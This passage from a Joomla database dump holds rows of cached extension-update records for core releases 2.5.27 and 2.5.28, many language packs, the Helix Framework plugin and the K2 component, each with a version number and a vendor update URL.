Cyrillic','','pkg_sr-RS','package','',0,'2.5.27.1','','http://update.joomla.org/language/details/sr-RS_details.xml',''),(1673,3,0,0,'Czech','','pkg_cs-CZ','package','',0,'2.5.27.2','','http://update.joomla.org/language/details/cs-CZ_details.xml',''),(1674,3,0,0,'Persian','','pkg_fa-IR','package','',0,'2.5.27.1','','http://update.joomla.org/language/details/fa-IR_details.xml',''),(1675,3,0,0,'Czech','','pkg_cs-CZ','package','',0,'2.5.27.2','','http://update.joomla.org/language/details/cs-CZ_details.xml',''),(1676,3,0,0,'Polish','','pkg_pl-PL','package','',0,'2.5.25.1','','http://update.joomla.org/language/details/pl-PL_details.xml',''),(1677,3,0,0,'Persian','','pkg_fa-IR','package','',0,'2.5.27.1','','http://update.joomla.org/language/details/fa-IR_details.xml',''),(1678,3,0,0,'Syriac','','pkg_sy-IQ','package','',0,'2.5.25.1','','http://update.joomla.org/language/details/sy-IQ_details.xml',''),(1679,3,0,0,'Polish','','pkg_pl-PL','package','',0,'2.5.25.1','','http://update.joomla.org/language/details/pl-PL_details.xml',''),(1680,3,0,0,'Russian','','pkg_ru-RU','package','',0,'2.5.24.1','','http://update.joomla.org/language/details/ru-RU_details.xml',''),(1681,3,0,0,'Syriac','','pkg_sy-IQ','package','',0,'2.5.25.1','','http://update.joomla.org/language/details/sy-IQ_details.xml',''),(1682,3,0,0,'Catalan','','pkg_ca-ES','package','',0,'2.5.27.1','','http://update.joomla.org/language/details/ca-ES_details.xml',''),(1683,3,0,0,'Russian','','pkg_ru-RU','package','',0,'2.5.24.1','','http://update.joomla.org/language/details/ru-RU_details.xml',''),(1684,3,0,0,'Afrikaans','','pkg_af-ZA','package','',0,'2.5.16.1','','http://update.joomla.org/language/details/af-ZA_details.xml',''),(1685,3,0,0,'Catalan','','pkg_ca-ES','package','',0,'2.5.27.1','','http://update.joomla.org/language/details/ca-ES_details.xml',''),(1686,3,0,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/zh-CN_details.xml',''),(1687,3,0,0,'Afrikaans','','pkg_af-ZA','package','',0,'2.5.16.1','','http://update.joomla.org/language/details/af-ZA_details.xml',''),(1688,3,0,0,'Finnish','','pkg_fi-FI','package','',0,'2.5.25.1','','http://update.joomla.org/language/details/fi-FI_details.xml',''),(1689,3,0,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/zh-CN_details.xml',''),(1690,3,0,0,'Chinese Traditional','','pkg_zh-TW','package','',0,'2.5.27.1','','http://update.joomla.org/language/details/zh-TW_details.xml',''),(1691,3,0,0,'Finnish','','pkg_fi-FI','package','',0,'2.5.25.1','','http://update.joomla.org/language/details/fi-FI_details.xml',''),(1692,3,0,0,'Chinese Traditional','','pkg_zh-TW','package','',0,'2.5.27.1','','http://update.joomla.org/language/details/zh-TW_details.xml',''),(1693,3,0,0,'Bosnian','','pkg_bs-BA','package','',0,'2.5.24.1','','http://update.joomla.org/language/details/bs-BA_details.xml',''),(1694,3,0,0,'Bosnian','','pkg_bs-BA','package','',0,'2.5.24.1','','http://update.joomla.org/language/details/bs-BA_details.xml',''),(1695,3,0,0,'Tamil India','','pkg_ta-IN','package','',0,'2.5.27.1','','http://update.joomla.org/language/details/ta-IN_details.xml',''),(1696,3,0,0,'Thai','','pkg_th-TH','package','',0,'2.5.27.1','','http://update.joomla.org/language/details/th-TH_details.xml',''),(1697,3,0,0,'Tamil India','','pkg_ta-IN','package','',0,'2.5.27.1','','http://update.joomla.org/language/details/ta-IN_details.xml',''),(1698,3,0,0,'Thai','','pkg_th-TH','package','',0,'2.5.27.1','','http://update.joomla.org/language/details/th-TH_details.xml',''),(1699,3,0,0,'Swahili','','pkg_sw-KE','package','',0,'2.5.27.1','','http://update.joomla.org/language/details/sw-KE_details.xml',''),(1700,3,0,0,'Swahili','','pkg_sw-KE','package','',0,'2.5.27.1','','http://update.joomla.org/language/details/sw-KE_details.xml',''),(1701,5,0,0,'System - Helix Framework','','helix','plugin','system',0,'2.1.8','','http://www.joomshaper.com/updates/plg_system_helix.xml',''),(1702,5,0,0,'System - Helix Framework','','helix','plugin','system',0,'2.1.8','','http://www.joomshaper.com/updates/plg_system_helix.xml',''),(1703,1,0,0,'Joomla','','joomla','file','',0,'2.5.27','','http://update.joomla.org/core/extension.xml',''),(1704,3,0,0,'Bahasa Indonesia','','pkg_id-ID','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/id-ID_details.xml',''),(1705,3,0,0,'Danish','','pkg_da-DK','package','',0,'2.5.26.1','','http://update.joomla.org/language/details/da-DK_details.xml',''),(1706,3,0,0,'Hungarian','','pkg_hu-HU','package','',0,'2.5.14.1','','http://update.joomla.org/language/details/hu-HU_details.xml',''),(1707,3,0,0,'French','','pkg_fr-FR','package','',0,'2.5.27.1','','http://update.joomla.org/language/details/fr-FR_details.xml',''),(1708,3,0,0,'Italian','','pkg_it-IT','package','',0,'2.5.27.1','','http://update.joomla.org/language/details/it-IT_details.xml',''),(1709,3,0,0,'Spanish','','pkg_es-ES','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/es-ES_details.xml',''),(1710,3,0,0,'Dutch','','pkg_nl-NL','package','',0,'2.5.27.1','','http://update.joomla.org/language/details/nl-NL_details.xml',''),(1711,3,0,0,'Turkish','','pkg_tr-TR','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/tr-TR_details.xml',''),(1712,3,0,0,'Slovak','','pkg_sk-SK','package','',0,'2.5.27.1','','http://update.joomla.org/language/details/sk-SK_details.xml',''),(1713,3,0,0,'Latvian','','pkg_lv-LV','package','',0,'2.5.27.1','','http://update.joomla.org/language/details/lv-LV_details.xml',''),(1714,3,0,0,'Estonian','','pkg_et-EE','package','',0,'2.5.25.1','','http://update.joomla.org/language/details/et-EE_details.xml',''),(1715,3,0,0,'Flemish','','pkg_nl-BE','package','',0,'2.5.27.1','','http://update.joomla.org/language/details/nl-BE_details.xml',''),(1716,3,0,0,'Macedonian','','pkg_mk-MK','package','',0,'2.5.27.1','','http://update.joomla.org/language/details/mk-MK_details.xml',''),(1717,3,0,0,'Japanese','','pkg_ja-JP','package','',0,'2.5.27.1','','http://update.joomla.org/language/details/ja-JP_details.xml',''),(1718,3,0,0,'Serbian Latin','','pkg_sr-YU','package','',0,'2.5.27.1','','http://update.joomla.org/language/details/sr-YU_details.xml',''),(1719,3,0,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'2.5.27.1','','http://update.joomla.org/language/details/ar-AA_details.xml',''),(1720,3,0,0,'German','','pkg_de-DE','package','',0,'2.5.27.1','','http://update.joomla.org/language/details/de-DE_details.xml',''),(1721,3,0,0,'Norwegian Bokmal','','pkg_nb-NO','package','',0,'2.5.27.1','','http://update.joomla.org/language/details/nb-NO_details.xml',''),(1722,3,0,0,'English AU','','pkg_en-AU','package','',0,'2.5.22.1','','http://update.joomla.org/language/details/en-AU_details.xml',''),(1723,3,0,0,'English US','','pkg_en-US','package','',0,'2.5.22.1','','http://update.joomla.org/language/details/en-US_details.xml',''),(1724,3,0,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'2.5.27.1','','http://update.joomla.org/language/details/sr-RS_details.xml',''),(1725,3,0,0,'Czech','','pkg_cs-CZ','package','',0,'2.5.27.2','','http://update.joomla.org/language/details/cs-CZ_details.xml',''),(1726,3,0,0,'Persian','','pkg_fa-IR','package','',0,'2.5.27.1','','http://update.joomla.org/language/details/fa-IR_details.xml',''),(1727,3,0,0,'Polish','','pkg_pl-PL','package','',0,'2.5.25.1','','http://update.joomla.org/language/details/pl-PL_details.xml',''),(1728,3,0,0,'Syriac','','pkg_sy-IQ','package','',0,'2.5.25.1','','http://update.joomla.org/language/details/sy-IQ_details.xml',''),(1729,3,0,0,'Russian','','pkg_ru-RU','package','',0,'2.5.24.1','','http://update.joomla.org/language/details/ru-RU_details.xml',''),(1730,3,0,0,'Catalan','','pkg_ca-ES','package','',0,'2.5.27.1','','http://update.joomla.org/language/details/ca-ES_details.xml',''),(1731,3,0,0,'Afrikaans','','pkg_af-ZA','package','',0,'2.5.16.1','','http://update.joomla.org/language/details/af-ZA_details.xml',''),(1732,3,0,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/zh-CN_details.xml',''),(1733,3,0,0,'Finnish','','pkg_fi-FI','package','',0,'2.5.25.1','','http://update.joomla.org/language/details/fi-FI_details.xml',''),(1734,3,0,0,'Chinese Traditional','','pkg_zh-TW','package','',0,'2.5.27.1','','http://update.joomla.org/language/details/zh-TW_details.xml',''),(1735,3,0,0,'Bosnian','','pkg_bs-BA','package','',0,'2.5.24.1','','http://update.joomla.org/language/details/bs-BA_details.xml',''),(1736,3,0,0,'Tamil India','','pkg_ta-IN','package','',0,'2.5.27.1','','http://update.joomla.org/language/details/ta-IN_details.xml',''),(1737,3,0,0,'Thai','','pkg_th-TH','package','',0,'2.5.27.1','','http://update.joomla.org/language/details/th-TH_details.xml',''),(1738,3,0,0,'Swahili','','pkg_sw-KE','package','',0,'2.5.27.1','','http://update.joomla.org/language/details/sw-KE_details.xml',''),(1739,5,0,0,'System - Helix Framework','','helix','plugin','system',0,'2.1.8','','http://www.joomshaper.com/updates/plg_system_helix.xml',''),(1740,1,0,0,'Joomla','','joomla','file','',0,'2.5.28','','http://update.joomla.org/core/extension.xml',''),(1741,3,0,0,'Bahasa Indonesia','','pkg_id-ID','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/id-ID_details.xml',''),(1742,3,0,0,'Danish','','pkg_da-DK','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/da-DK_details.xml',''),(1743,3,0,0,'Swedish','','pkg_sv-SE','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/sv-SE_details.xml',''),(1744,3,0,0,'Hungarian','','pkg_hu-HU','package','',0,'2.5.14.1','','http://update.joomla.org/language/details/hu-HU_details.xml',''),(1745,3,0,0,'French','','pkg_fr-FR','package','',0,'2.5.28.2','','http://update.joomla.org/language/details/fr-FR_details.xml',''),(1746,3,0,0,'Italian','','pkg_it-IT','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/it-IT_details.xml',''),(1747,3,0,0,'Spanish','','pkg_es-ES','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/es-ES_details.xml',''),(1748,3,0,0,'Dutch','','pkg_nl-NL','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/nl-NL_details.xml',''),(1749,3,0,0,'Turkish','','pkg_tr-TR','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/tr-TR_details.xml',''),(1750,3,0,0,'Slovak','','pkg_sk-SK','package','',0,'2.5.27.1','','http://update.joomla.org/language/details/sk-SK_details.xml',''),(1751,3,0,0,'Latvian','','pkg_lv-LV','package','',0,'2.5.27.1','','http://update.joomla.org/language/details/lv-LV_details.xml',''),(1752,3,0,0,'Estonian','','pkg_et-EE','package','',0,'2.5.25.1','','http://update.joomla.org/language/details/et-EE_details.xml',''),(1753,3,0,0,'Flemish','','pkg_nl-BE','package','',0,'2.5.27.1','','http://update.joomla.org/language/details/nl-BE_details.xml',''),(1754,3,0,0,'Macedonian','','pkg_mk-MK','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/mk-MK_details.xml',''),(1755,3,0,0,'Japanese','','pkg_ja-JP','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/ja-JP_details.xml',''),(1756,3,0,0,'Serbian Latin','','pkg_sr-YU','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/sr-YU_details.xml',''),(1757,3,0,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/ar-AA_details.xml',''),(1758,3,0,0,'German','','pkg_de-DE','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/de-DE_details.xml',''),(1759,3,0,0,'Norwegian Bokmal','','pkg_nb-NO','package','',0,'2.5.27.1','','http://update.joomla.org/language/details/nb-NO_details.xml',''),(1760,3,0,0,'English AU','','pkg_en-AU','package','',0,'2.5.22.2','','http://update.joomla.org/language/details/en-AU_details.xml',''),(1761,3,0,0,'English US','','pkg_en-US','package','',0,'2.5.22.1','','http://update.joomla.org/language/details/en-US_details.xml',''),(1762,3,0,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/sr-RS_details.xml',''),(1763,3,0,0,'Czech','','pkg_cs-CZ','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/cs-CZ_details.xml',''),(1764,3,0,0,'Persian','','pkg_fa-IR','package','',0,'2.5.27.1','','http://update.joomla.org/language/details/fa-IR_details.xml',''),(1765,3,0,0,'Polish','','pkg_pl-PL','package','',0,'2.5.25.1','','http://update.joomla.org/language/details/pl-PL_details.xml',''),(1766,3,0,0,'Syriac','','pkg_sy-IQ','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/sy-IQ_details.xml',''),(1767,3,0,0,'Russian','','pkg_ru-RU','package','',0,'2.5.24.1','','http://update.joomla.org/language/details/ru-RU_details.xml',''),(1768,3,0,0,'Catalan','','pkg_ca-ES','package','',0,'2.5.27.1','','http://update.joomla.org/language/details/ca-ES_details.xml',''),(1769,3,0,0,'Afrikaans','','pkg_af-ZA','package','',0,'2.5.16.1','','http://update.joomla.org/language/details/af-ZA_details.xml',''),(1770,3,0,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/zh-CN_details.xml',''),(1771,3,0,0,'Finnish','','pkg_fi-FI','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/fi-FI_details.xml',''),(1772,3,0,0,'Chinese Traditional','','pkg_zh-TW','package','',0,'2.5.27.1','','http://update.joomla.org/language/details/zh-TW_details.xml',''),(1773,3,0,0,'Bosnian','','pkg_bs-BA','package','',0,'2.5.24.1','','http://update.joomla.org/language/details/bs-BA_details.xml',''),(1774,3,0,0,'Tamil India','','pkg_ta-IN','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/ta-IN_details.xml',''),(1775,3,0,0,'Thai','','pkg_th-TH','package','',0,'2.5.27.1','','http://update.joomla.org/language/details/th-TH_details.xml',''),(1776,3,0,0,'Swahili','','pkg_sw-KE','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/sw-KE_details.xml',''),(1777,5,0,0,'System - Helix Framework','','helix','plugin','system',0,'2.1.8','','http://www.joomshaper.com/updates/plg_system_helix.xml',''),(1778,6,0,0,'K2','K2, the powerful content extension for Joomla (by JoomlaWorks)','com_k2','component','',1,'2.6.9','','http://getk2.org/update.xml',''),(1779,1,0,0,'Joomla','','joomla','file','',0,'2.5.28','','http://update.joomla.org/core/extension.xml',''),(1780,3,0,0,'Bahasa Indonesia','','pkg_id-ID','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/id-ID_details.xml',''),(1781,3,0,0,'Danish','','pkg_da-DK','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/da-DK_details.xml',''),(1782,3,0,0,'Swedish','','pkg_sv-SE','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/sv-SE_details.xml',''),(1783,3,0,0,'Hungarian','','pkg_hu-HU','package','',0,'2.5.14.1','','http://update.joomla.org/language/details/hu-HU_details.xml',''),(1784,3,0,0,'French','','pkg_fr-FR','package','',0,'2.5.28.2','','http://update.joomla.org/language/details/fr-FR_details.xml',''),(1785,3,0,0,'Italian','','pkg_it-IT','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/it-IT_details.xml',''),(1786,3,0,0,'Spanish','','pkg_es-ES','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/es-ES_details.xml',''),(1787,3,0,0,'Dutch','','pkg_nl-NL','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/nl-NL_details.xml',''),(1788,3,0,0,'Turkish','','pkg_tr-TR','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/tr-TR_details.xml',''),(1789,3,0,0,'Slovak','','pkg_sk-SK','package','',0,'2.5.27.1','','http://update.joomla.org/language/details/sk-SK_details.xml',''),(1790,3,0,0,'Latvian','','pkg_lv-LV','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/lv-LV_details.xml',''),(1791,3,0,0,'Estonian','','pkg_et-EE','package','',0,'2.5.25.1','','http://update.joomla.org/language/details/et-EE_details.xml',''),(1792,3,0,0,'Flemish','','pkg_nl-BE','package','',0,'2.5.27.1','','http://update.joomla.org/language/details/nl-BE_details.xml',''),(1793,3,0,0,'Macedonian','','pkg_mk-MK','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/mk-MK_details.xml',''),(1794,3,0,0,'Japanese','','pkg_ja-JP','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/ja-JP_details.xml',''),(1795,3,0,0,'Serbian Latin','','pkg_sr-YU','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/sr-YU_details.xml',''),(1796,3,0,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/ar-AA_details.xml',''),(1797,3,0,0,'German','','pkg_de-DE','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/de-DE_details.xml',''),(1798,3,0,0,'Norwegian Bokmal','','pkg_nb-NO','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/nb-NO_details.xml',''),(1799,3,0,0,'English AU','','pkg_en-AU','package','',0,'2.5.22.2','','http://update.joomla.org/language/details/en-AU_details.xml',''),(1800,3,0,0,'English US','','pkg_en-US','package','',0,'2.5.22.1','','http://update.joomla.org/language/details/en-US_details.xml',''),(1801,3,0,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/sr-RS_details.xml',''),(1802,3,0,0,'Czech','','pkg_cs-CZ','package','',0,'2.5.28.2','','http://update.joomla.org/language/details/cs-CZ_details.xml',''),(1803,3,0,0,'Persian','','pkg_fa-IR','package','',0,'2.5.27.1','','http://update.joomla.org/language/details/fa-IR_details.xml',''),(1804,3,0,0,'Polish','','pkg_pl-PL','package','',0,'2.5.25.1','','http://update.joomla.org/language/details/pl-PL_details.xml',''),(1805,3,0,0,'Syriac','','pkg_sy-IQ','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/sy-IQ_details.xml',''),(1806,3,0,0,'Russian','','pkg_ru-RU','package','',0,'2.5.24.1','','http://update.joomla.org/language/details/ru-RU_details.xml',''),(1807,3,0,0,'Catalan','','pkg_ca-ES','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/ca-ES_details.xml',''),(1808,3,0,0,'Afrikaans','','pkg_af-ZA','package','',0,'2.5.16.1','','http://update.joomla.org/language/details/af-ZA_details.xml',''),(1809,3,0,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/zh-CN_details.xml',''),(1810,3,0,0,'Finnish','','pkg_fi-FI','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/fi-FI_details.xml',''),(1811,3,0,0,'Chinese Traditional','','pkg_zh-TW','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/zh-TW_details.xml',''),(1812,3,0,0,'Bosnian','','pkg_bs-BA','package','',0,'2.5.24.1','','http://update.joomla.org/language/details/bs-BA_details.xml',''),(1813,3,0,0,'Tamil India','','pkg_ta-IN','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/ta-IN_details.xml',''),(1814,3,0,0,'Thai','','pkg_th-TH','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/th-TH_details.xml',''),(1815,3,0,0,'Swahili','','pkg_sw-KE','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/sw-KE_details.xml',''),(1816,5,0,0,'System - Helix Framework','','helix','plugin','system',0,'2.1.8','','http://www.joomshaper.com/updates/plg_system_helix.xml',''),(1817,6,0,0,'K2','K2, the powerful content extension for Joomla (by JoomlaWorks)','com_k2','component','',1,'2.6.9','','http://getk2.org/update.xml',''),(1818,1,0,0,'Joomla','','joomla','file','',0,'2.5.28','','http://update.joomla.org/core/extension.xml',''),(1819,3,0,0,'Bahasa Indonesia','','pkg_id-ID','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/id-ID_details.xml',''),(1820,3,0,0,'Danish','','pkg_da-DK','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/da-DK_details.xml',''),(1821,3,0,0,'Swedish','','pkg_sv-SE','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/sv-SE_details.xml',''),(1822,3,0,0,'Hungarian','','pkg_hu-HU','package','',0,'2.5.14.1','','http://update.joomla.org/language/details/hu-HU_details.xml',''),(1823,3,0,0,'French','','pkg_fr-FR','package','',0,'2.5.28.2','','http://update.joomla.org/language/details/fr-FR_details.xml',''),(1824,3,0,0,'Italian','','pkg_it-IT','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/it-IT_details.xml',''),(1825,3,0,0,'Spanish','','pkg_es-ES','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/es-ES_details.xml',''),(1826,3,0,0,'Dutch','','pkg_nl-NL','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/nl-NL_details.xml',''),(1827,3,0,0,'Turkish','','pkg_tr-TR','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/tr-TR_details.xml',''),(1828,3,0,0,'Slovak','','pkg_sk-SK','package','',0,'2.5.27.1','','http://update.joomla.org/language/details/sk-SK_details.xml',''),(1829,3,0,0,'Latvian','','pkg_lv-LV','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/lv-LV_details.xml',''),(1830,3,0,0,'Estonian','','pkg_et-EE','package','',0,'2.5.25.1','','http://update.joomla.org/language/details/et-EE_details.xml',''),(1831,3,0,0,'Flemish','','pkg_nl-BE','package','',0,'2.5.27.1','','http://update.joomla.org/language/details/nl-BE_details.xml',''),(1832,3,0,0,'Macedonian','','pkg_mk-MK','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/mk-MK_details.xml',''),(1833,3,0,0,'Japanese','','pkg_ja-JP','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/ja-JP_details.xml',''),(1834,3,0,0,'Serbian Latin','','pkg_sr-YU','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/sr-YU_details.xml',''),(1835,3,0,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/ar-AA_details.xml',''),(1836,3,0,0,'German','','pkg_de-DE','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/de-DE_details.xml',''),(1837,3,0,0,'Norwegian Bokmal','','pkg_nb-NO','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/nb-NO_details.xml',''),(1838,3,0,0,'English AU','','pkg_en-AU','package','',0,'2.5.22.2','','http://update.joomla.org/language/details/en-AU_details.xml',''),(1839,3,0,0,'English US','','pkg_en-US','package','',0,'2.5.22.1','','http://update.joomla.org/language/details/en-US_details.xml',''),(1840,3,0,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/sr-RS_details.xml',''),(1841,3,0,0,'Czech','','pkg_cs-CZ','package','',0,'2.5.28.2','','http://update.joomla.org/language/details/cs-CZ_details.xml',''),(1842,3,0,0,'Persian','','pkg_fa-IR','package','',0,'2.5.27.1','','http://update.joomla.org/language/details/fa-IR_details.xml',''),(1843,3,0,0,'Polish','','pkg_pl-PL','package','',0,'2.5.25.1','','http://update.joomla.org/language/details/pl-PL_details.xml',''),(1844,3,0,0,'Syriac','','pkg_sy-IQ','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/sy-IQ_details.xml',''),(1845,3,0,0,'Russian','','pkg_ru-RU','package','',0,'2.5.24.1','','http://update.joomla.org/language/details/ru-RU_details.xml',''),(1846,3,0,0,'Catalan','','pkg_ca-ES','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/ca-ES_details.xml',''),(1847,3,0,0,'Afrikaans','','pkg_af-ZA','package','',0,'2.5.16.1','','http://update.joomla.org/language/details/af-ZA_details.xml',''),(1848,3,0,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/zh-CN_details.xml',''),(1849,3,0,0,'Finnish','','pkg_fi-FI','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/fi-FI_details.xml',''),(1850,3,0,0,'Chinese Traditional','','pkg_zh-TW','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/zh-TW_details.xml',''),(1851,3,0,0,'Bosnian','','pkg_bs-BA','package','',0,'2.5.24.1','','http://update.joomla.org/language/details/bs-BA_details.xml',''),(1852,3,0,0,'Tamil India','','pkg_ta-IN','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/ta-IN_details.xml',''),(1853,3,0,0,'Thai','','pkg_th-TH','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/th-TH_details.xml',''),(1854,3,0,0,'Swahili','','pkg_sw-KE','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/sw-KE_details.xml',''),(1855,5,0,0,'System - Helix Framework','','helix','plugin','system',0,'2.1.8','','http://www.joomshaper.com/updates/plg_system_helix.xml',''),(1856,6,0,0,'K2','K2, the powerful content extension for Joomla (by JoomlaWorks)','com_k2','component','',1,'2.6.9','','http://getk2.org/update.xml',''),(1857,1,0,0,'Joomla','','joomla','file','',0,'2.5.28','','http://update.joomla.org/core/extension.xml',''),(1858,3,0,0,'Bahasa Indonesia','','pkg_id-ID','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/id-ID_details.xml',''),(1859,3,0,0,'Danish','','pkg_da-DK','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/da-DK_details.xml',''),(1860,3,0,0,'Swedish','','pkg_sv-SE','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/sv-SE_details.xml',''),(1861,3,0,0,'Hungarian','','pkg_hu-HU','package','',0,'2.5.14.1','','http://update.joomla.org/language/details/hu-HU_details.xml',''),(1862,3,0,0,'French','','pkg_fr-FR','package','',0,'2.5.28.2','','http://update.joomla.org/language/details/fr-FR_details.xml',''),(1863,3,0,0,'Italian','','pkg_it-IT','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/it-IT_details.xml',''),(1864,3,0,0,'Spanish','','pkg_es-ES','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/es-ES_details.xml',''),(1865,3,0,0,'Dutch','','pkg_nl-NL','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/nl-NL_details.xml',''),(1866,3,0,0,'Turkish','','pkg_tr-TR','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/tr-TR_details.xml',''),(1867,3,0,0,'Slovak','','pkg_sk-SK','package','',0,'2.5.27.1','','http://update.joomla.org/language/details/sk-SK_details.xml',''),(1868,3,0,0,'Latvian','','pkg_lv-LV','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/lv-LV_details.xml',''),(1869,3,0,0,'Estonian','','pkg_et-EE','package','',0,'2.5.25.1','','http://update.joomla.org/language/details/et-EE_details.xml',''),(1870,3,0,0,'Flemish','','pkg_nl-BE','package','',0,'2.5.27.1','','http://update.joomla.org/language/details/nl-BE_details.xml',''),(1871,3,0,0,'Macedonian','','pkg_mk-MK','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/mk-MK_details.xml',''),(1872,3,0,0,'Japanese','','pkg_ja-JP','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/ja-JP_details.xml',''),(1873,3,0,0,'Serbian Latin','','pkg_sr-YU','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/sr-YU_details.xml',''),(1874,3,0,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/ar-AA_details.xml',''),(1875,3,0,0,'German','','pkg_de-DE','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/de-DE_details.xml',''),(1876,3,0,0,'Norwegian Bokmal','','pkg_nb-NO','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/nb-NO_details.xml',''),(1877,3,0,0,'English AU','','pkg_en-AU','package','',0,'2.5.22.2','','http://update.joomla.org/language/details/en-AU_details.xml',''),(1878,3,0,0,'English US','','pkg_en-US','package','',0,'2.5.22.1','','http://update.joomla.org/language/details/en-US_details.xml',''),(1879,3,0,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/sr-RS_details.xml',''),(1880,3,0,0,'Czech','','pkg_cs-CZ','package','',0,'2.5.28.2','','http://update.joomla.org/language/details/cs-CZ_details.xml',''),(1881,3,0,0,'Persian','','pkg_fa-IR','package','',0,'2.5.27.1','','http://update.joomla.org/language/details/fa-IR_details.xml',''),(1882,3,0,0,'Polish','','pkg_pl-PL','package','',0,'2.5.25.1','','http://update.joomla.org/language/details/pl-PL_details.xml',''),(1883,3,0,0,'Syriac','','pkg_sy-IQ','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/sy-IQ_details.xml',''),(1884,3,0,0,'Russian','','pkg_ru-RU','package','',0,'2.5.24.1','','http://update.joomla.org/language/details/ru-RU_details.xml',''),(1885,3,0,0,'Catalan','','pkg_ca-ES','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/ca-ES_details.xml',''),(1886,3,0,0,'Afrikaans','','pkg_af-ZA','package','',0,'2.5.16.1','','http://update.joomla.org/language/details/af-ZA_details.xml',''),(1887,3,0,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/zh-CN_details.xml',''),(1888,3,0,0,'Finnish','','pkg_fi-FI','package','',0,'2.5.28.1','','http://update.joomla.org/language/details/fi-FI_details.xml',''),(1889,3,0,0,'Chinese 